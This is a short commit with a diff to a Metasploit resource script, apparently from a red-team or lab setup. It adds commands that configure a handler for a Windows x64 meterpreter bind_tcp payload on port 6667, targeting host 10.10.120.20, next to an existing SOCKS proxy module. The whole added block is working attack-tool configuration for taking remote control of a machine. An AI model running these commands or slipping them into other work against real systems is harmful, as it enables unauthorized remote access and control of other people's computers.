Configured commands with an example bind_tcp meterpreter

--- a/supporting/metasploit/commands.rc
+++ b/supporting/metasploit/commands.rc
@@ -12,3 +12,10 @@ set ReverseListenerBindPort 6667
 run -j 
 use auxiliary/server/socks_proxy
 run -j
+use exploit/multi/handler
+set payload windows/x64/meterpreter/bind_tcp
+set LPORT 6667
+set EXITFUNC process
+set RHOST 10.10.120.20
+exploit -j
+
